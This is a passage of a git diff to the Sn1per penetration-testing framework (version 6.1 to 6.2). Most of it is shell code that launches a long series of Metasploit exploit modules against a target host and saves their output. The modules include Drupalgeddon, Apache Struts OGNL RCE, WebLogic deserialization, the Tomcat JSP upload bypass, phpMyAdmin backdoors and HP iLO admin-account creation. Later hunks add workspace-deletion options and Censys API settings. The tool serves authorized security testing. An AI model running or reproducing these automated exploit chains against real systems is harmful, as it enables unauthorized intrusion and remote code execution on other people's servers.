$LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null - - - - - - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw 2> /dev/null - - - - - - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null + SSL="true" + source modes/web_autopwn.sh fi source modes/osint_stage_2.sh fi diff --git a/sniper b/sniper index 624b310b..f57a2022 100755 --- a/sniper +++ b/sniper @@ -3,7 +3,7 @@ # + -- --=[https://xerosecurity.com # -VER="6.1" +VER="6.2" INSTALL_DIR="/usr/share/sniper" LOOT_DIR="$INSTALL_DIR/loot/$TARGET" SNIPER_PRO=$INSTALL_DIR/pro.sh @@ -73,6 +73,12 @@ function help { echo ' [*] LIST WORKSPACES' echo ' sniper --list' echo "" + echo ' [*] DELETE WORKSPACE' + echo ' sniper -w -d' + echo "" + echo ' [*] DELETE HOST FROM WORKSPACE' + echo ' sniper -w -t -dh' + echo "" echo ' [*] GET SNIPER SCAN STATUS' echo ' sniper --status' echo "" @@ -231,14 +237,33 @@ case $key in shift # past argument shift # past argument ;; + -d|--delete) + echo "Do you want to remove the workspace? $WORKSPACE_DIR" + read ANS + rm -Rf /usr/share/sniper/loot/workspace/$WORKSPACE/ + exit + shift # past argument + ;; + -dh|--delete-host) + echo "Do you want to remove $TARGET from $WORKSPACE?" + read ANS + sed -i "/$TARGET/d" $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt $WORKSPACE_DIR/domains/targets.txt 2> /dev/null + rm -f $WORKSPACE_DIR/screenshots/$TARGET*.jpg 2> /dev/null + sniper --reimport -w $WORKSPACE + exit + shift # past argument + ;; --list) logo ls -l $INSTALL_DIR/loot/workspace/ echo "" echo "cd /usr/share/sniper/loot/workspace/" - SNIPER_PRO=$INSTALL_DIR/pro.sh - if [ -f $SNIPER_PRO ]; then + WORKSPACE_REPORT=$LOOT_DIR/sniper-report.html + if [ -f $WORKSPACE_REPORT ]; then echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET" + $BROWSER $INSTALL_DIR/loot/workspace/sniper-report.html 2> /dev/null > /dev/null & + else + echo -e "$OKORANGE + -- --=[Loading workspaces...$RESET" $BROWSER $INSTALL_DIR/loot/workspace/ 2> /dev/null > /dev/null & fi exit @@ -366,27 +391,20 @@ function loot { cd $LOOT_DIR if [ -f $SNIPER_PRO ]; then - echo -e "$OKORANGE + -- --=[Do you want to load Sn1per Professional (y or n)? $RESET" - read ANS - if [ "$ANS" == "y" ]; then + if [ "$SN1PER_AUTOLOAD" = "1" ]; then echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET" source $INSTALL_DIR/pro.sh $BROWSER $LOOT_DIR/sniper-report.html 2> /dev/null > /dev/null & - echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET" - # DISABLED FOR V7 ONLY! - #echo -e "$OKORANGE + -- --=[Do you want to load all updated host reports (y or n)? $RESET" - #cat $UPDATED_TARGETS 2> /dev/null - #read ANS2 - #if [ "$ANS2" == "y" ]; then - # - # for a in `cat $UPDATED_TARGETS`; do - # $BROWSER "$LOOT_DIR/reports/sniper-$a.html" 2> /dev/null > /dev/null & - # done - # rm -f $UPDATED_TARGETS 2> /dev/null - # touch $UPDATED_TARGETS 2> /dev/null - #fi - else - echo -e "$OKORANGE + -- --=[Skipping report generation. $RESET" + else + echo -e "$OKORANGE + -- --=[Do you want to load Sn1per Professional (y or n)? $RESET" + read ANS + if [ "$ANS" == "y" ]; then + echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET" + source $INSTALL_DIR/pro.sh + $BROWSER $LOOT_DIR/sniper-report.html 2> /dev/null > /dev/null & + else + echo -e "$OKORANGE + -- --=[Skipping report generation. $RESET" + fi fi else echo -e "$OKRED + -- --=[Sn1per Professional is not installed. To download Sn1per Professional, go to https://xerosecurity.com. $RESET" diff --git a/sniper.conf b/sniper.conf index d93d61f7..8ef725a1 100644 --- a/sniper.conf +++ b/sniper.conf @@ -21,6 +21,7 @@ REPORT="1" LOOT="1" METASPLOIT_IMPORT="0" SNIPER_PRO_CONSOLE_OUTPUT="0" +SN1PER_AUTOLOAD="1" # DEFAULT BROWSER BROWSER="firefox" @@ -33,6 +34,10 @@ BURP_PORT="1337" MSF_LHOST="127.0.0.1" MSF_LPORT="4444" +# API KEYS +CENSYS_APP_ID="" +CENSYS_API_SECRET="" + # WEB BRUTE FORCE WORDLISTS WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt" WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/web-brute-full.txt" @@ -57,6 +62,7 @@ QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1433, DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049" DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535" DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,520,2049" +FULL_PORTSCAN_PORTS="1-65535" THREADS="30" @@ -93,6 +99,7 @@ WHATWEB="1" WIG="1" SHOCKER="1" JEXBOSS="1" +WEBTECH="1" # ACTIVE WEB BRUTE FORCE STAGES WEB_BRUTE_STEALTHSCAN="1" @@ -117,3 +124,5 @@ SUBFINDER="1" DNSCAN="1" CRTSH="1" SUBOVER="1" +PROJECT_SONAR="1" +CENSYS_SUBDOMAINS="1" \ No newline at end of file